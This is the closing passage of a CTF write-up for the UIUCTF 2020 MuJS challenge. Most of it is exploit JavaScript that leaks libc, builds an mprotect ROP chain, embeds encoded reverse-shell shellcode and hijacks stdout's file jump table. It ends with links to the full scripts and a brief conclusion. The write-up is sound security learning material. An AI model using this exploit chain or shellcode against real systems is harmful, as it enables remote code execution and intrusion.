sentinel_addr-sentinel_offset; print(hex(code_base)); //Leak libc base var getpwnam_addr = read64(code_base+getpwnam_got_offset,master,slave); var libc_base = getpwnam_addr-getpwnam_offset; print(hex(libc_base)); //Stub and ROPchain to perform mprotect and jumps onto shellcode var stub = [0, 0, 0, 0, libc_base+L_setcontext, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, code_base+bss_offset+0xb0, libc_base+L_nop]; var ROPchain = [libc_base+L_pop_rdi, code_base+(bss_offset&0xff000), libc_base+L_pop_rsi, 0x1000, libc_base+L_pop_rdx_rbx, 7, 0, libc_base+L_pop_rax, 10, libc_base+L_syscall, code_base+bss_offset+0x108]; var payload = stub.concat(ROPchain); write64_batch(code_base+bss_offset,payload,master,slave); //A simple reverse shell that supports ls, cat, exit //Source assembly can be found in my github repo var minimal_reverse_shell = [46647112,1207959552,116423,3343384576,194,3234285568,41,2303264015,3284617412,0,2361622856,1210434160,1209066433,1965540225,3242721280,2202538211,1280508611,2303256457,3267840230,16,717277000,251658240,3351726085,0,611618121,3234285569,33,3343385871,455,1955416320,3343385124,8640,1275399936,3343443849,198,3234285568,33,3343385871,454,3234285568,33,2917729551,1224736770,3343514761,197,3351726080,0,1223067980,115399,3343384576,192,1090850560,170146944,4282978676,3321842116,4278026569,1946157071,1104079618,2360518,608486977,2303459329,3343434728,192,121405440,1208316928,4125868287,541032643,1959264072,3489614072,3287845192,3301394782,0,1960065353,747259416,881477159,3305064742,1962227781,3234285803,0,3234285763,1,4220078275,3906963784,66,33063752,3343386741,448,2303247104,3926239,2202533888,141885944,46188360,3271557120,3906963784,51,33063752,3343386741,960,3343434496,4294967232,3343434751,962,4286244864,1633943551,3267840116,2,4294929384,1215524095,312007,1575485440,1711276031,1601464696,16745288,2303206260,3750316283,4294911464,3263777023,29869896,1207959552,3343441545,448,3942977280,1208642262,116679,2303197184,3267840230,1,29411144,251658240,1220762373,2303261577,3334949087,0,12765000,1207959552,180423,84869120,16286536,2303278204,3884534980,1222543688,16827079,3343384576,192,1225068288,3343435145,455,3733538816,1223330124,114887,84869120,16613705,1946157057,6996936,4283557971,1633943551,1768300660,1696621932,1919906418,2112032,1224444232,3343441801,16777414,3267840000,0,46188360,251658240,4169353221,2374766336,1224736768,2303509641,3012380903,256,12765000,1207959567,5161159,84869120,16286536,1735682684,1237682505,50887,2370568192,65723,3996732672,2370422909,199758463,1224736766,2370421385,3343389303,455,3234285568,1,174720271,1223067976,116679,3343384576,450,3234285568,1,1214121231,49351,1097203712,1225803659,21612289,3282758598,3897753706,4294966915,1696625516,1919906418,2112032,13092680,1207959552,3981511,84869120,13092680,1207959552,268486343,3343384576,1986,3267840256,34,4294948937,65535,3343450112,193,3234285568,9,2303198479,4018751685,4294775528,4169353471,1209367552,2666065801,1224736765,1979709571,6416419,3723165696,1512,4287293440,7012351,4294834920,1634030335,1919230052,7499634,33063752,2370311029,719848575,1224736765,552126345,3959422974,4169353384,1210021122,3892542861,4294966545,1962948736,771802631,82118,3905390920,4294966900,904430571,1795162111,4255508480,1852637183,1768710518,1868767332,1851878765,100]; write32_batch(code_base+bss_offset+0x108,minimal_reverse_shell,master,slave); //Hijack IO_file_jumps function pointer to trigger throught stdout IO_WRITE var trampoline = libc_base+L_trampoline; var pivot = code_base+bss_offset; write64(libc_base+stdout_readptr_offset,code_base+bss_offset,master,slave); write64(libc_base+IO_file_jumps_write_offset,libc_base+L_trampoline,master,slave); print("get shell"); ``` ![](https://i.imgur.com/GP9lwsz.png) Source Scripts : \>> [Complete Get Shell Script](https://github.com/jwang-a/CTF/blob/master/Writeups/UIUCTF2020/Pwn/MuJS/exploit_shell.js) \>> [Minimal Reverse Shell](https://github.com/jwang-a/CTF/blob/master/Writeups/UIUCTF2020/Pwn/MuJS/Minimal_Reverse_Shell.py) \>> [Memory Dump Parser](https://github.com/jwang-a/CTF/blob/master/Writeups/UIUCTF2020/Pwn/MuJS/Memorydump_Parser.py) [Top](#UIUCTF-MuJS-Writeup) --- ## 0x06 > Conclusion The writeup ended up far longer than I expected, but this much is required to cover all the stuff I learned here. And again, since I am new to jsengine pwning, it is possible for me to make mistakes. If you happen to spot anything wrong in this writeup, please let me know. Overall, MuJS was a cool challenge. Thanks to Sigpwny for holding such an amazing CTF, samsonites for making this challenge, and Rob & pepsipu for helping me through this challenge. [Top](#UIUCTF-MuJS-Writeup)